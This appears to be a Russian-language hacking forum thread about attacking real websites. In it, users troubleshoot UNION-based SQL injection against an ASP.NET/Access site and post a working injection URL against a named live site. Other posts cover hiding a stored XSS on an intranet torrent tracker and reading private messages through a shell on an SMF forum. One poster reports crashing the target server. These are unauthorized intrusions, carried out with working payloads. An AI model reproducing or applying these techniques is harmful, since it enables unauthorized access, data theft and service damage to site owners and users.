Просто я никогда их не использовал. Мой любимый сниф- Ettercap. Другие познавать это время, а времени нет.
Там не нужно ничего познавать. Единственный аргумент, который тебе придется использовать это "-i", для указания интерфейса(если он не один). Пример: Все
Привет! Надеюсь пишу в нужную тему. Ситуация: есть самописный движок на ASP .NET, база Access. Пытаюсь сделать SQL inj вида: _http://url/page.aspx?page=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+tablename%00 При этом получается ошибка: Exception Details: System.InvalidCastException: Specified cast is not valid. Т.е. как я понимаю где-то в запросе данные преобразуются и проверяются... Можно ли как-то просто вычислить это место? Табличка и тип базы точно известны, т.к. удалось успешно использовать почти такую же inj в другом проекте на этом движке Но там использовалась уязвимость в части, которой на нужном сайте просто нет. Число параметров подобрано по order by
tempuser помнится когда я хекал maccess делал чтото типо этого для вывода табл. а так бы ссылочку посмотреть )
это был mssql, а не access видимо проблемы с преобразованием типов данных, хотя для access это не свойственно. Возможное решение можно бы было найти в MS Access Cheat Sheet, но тот сайт закрыли. Ни у кого не осталось? upd а вот нашел - http://www.xuexi123.net/chm/MS%20Access%20SQL%20Injection%20Cheat%20Sheet.htm правда инфы по поводу преобразования типов данных нет
Зачем в INFORMATION_SCHEMA.TABLES лезть то? Во первых её просто нету в access (вы с MySQL путаете ), а во вторых имя нужной таблицы с пользователями известно на 100%. Также известны имена полей в этой табличке. Известна даже админка ))) Но блин тип какого то параметра походу не совпадает... И обломс. Ссылочку - сорри. Сайт довольно дружественный, не хотелось бы случайно вандализировать Ковыряюсь в нем из чистого любопытства. Вот более подробно сообщение об ошибке: Code: Server Error in '/' Application. Specified cast is not valid. Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code. Exception Details: System.InvalidCastException: Specified cast is not valid. Source Error: An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below. Stack Trace: [InvalidCastException: Specified cast is not valid.] System.Data.OleDb.OleDbDataReader.GetBoolean(Int32 ordinal) +44 ecomm.CPage.InitFromDataReader(OleDbDataReader dr) ecomm.CPage..ctor(String ID, String PageName, String conStr) ecomm.PageTemplateControl.get_vieName() ecomm.PageTemplateControl.InitControl() ecomm.TemplateControl.CreateChildControls() System.Web.UI.Control.EnsureChildControls() +100 System.Web.UI.Control.PreRenderRecursiveInternal() +38 System.Web.UI.Control.PreRenderRecursiveInternal() +125 System.Web.UI.Control.PreRenderRecursiveInternal() +125 System.Web.UI.Control.PreRenderRecursiveInternal() +125 System.Web.UI.Page.ProcessRequestMain() +1499 Version Information: Microsoft .NET Framework Version:1.1.4322.2407; ASP.NET Version:1.1.4322.2407
попробуй все числа null'ами заменить: union select null,null,null,... потом последовательно заменяй null на числа, строки. Вот список функций в Access, может понадобиться: http://www.techonthenet.com/access/functions/index_alpha.php
Помогло Правда не до конца, но похоже он ругается на четвертый параметр, при замене его на null ошибка изменяется на Exception Details: System.NullReferenceException: Object reference not set to an instance of an object.
Пока ситуация такова: 1. На 2 следующих запроса 1,2,3,null,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 1,2,3,CDec(1),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 отвечает Object reference not set to an instance of an object 2. На все остальное вида 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 1,2,3,CHR(66),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 отвечает Specified cast is not valid . Проверены int, string, byte, bool, всякие даты, CDate. null и double... Что у них общего и чем они отличаются от int или char? Или с double уже угадал и ему не нравится что то ещё? Но если угадал, то почему ошибка на остальное не cast как раньше а object reference?
В общем сервер немножко сломался :lol: Счас выкидывает ошибку Unspecified error прямо на главной странице сайта и в общем то не работает. Мда... Перестарались.......
Вопрос с активной хсс вобщем на внтутресетевом торенте нашол активную хсс. Когда делаеш раздачю в название пишеш название потом пишу хсс она пашет но она отображается в название можно её скрыть как-то ?
Народ имееться шелл на двиге SMF 1.1.4 Когда смотрю Л.С. через базу то меня интересует когда ПМ отправилось! А там показываеться это! msgtime 1227282680 Как это понимать?
имеется sql inj если делаю чтонибудь наподобие: то выводится ошибка: что я не правильно делаю? как тут быть?
http://www.heimlichinstitute.org/page.php?id=-1+union+select+1,unhex(hex(VERSION())),3,4-- add: Raz0r,
Главная You have an error in your SQL syntax near \'union+select+1/*\', \'90.150.48.**\', \'0\')\' at line 1 SQL=INSERT INTO jos_fb_whoisonline (`userid` , `time`, `what`, `task`, `do`, `func`,`link`, `userip`, `user`) VALUES (\'0\', \'1227551255\', \'Главная\',\'\',\'\',\'\',\'/index.php?option=com_fireboard&Itemid=-1\'+union+select+1/*\', \'90.150.**.**\', \'0\') Скуль в инсерте. Толку нету. Таблица бестолковая, да и magic_quotes_gpc = on. Можешь забить на неё.
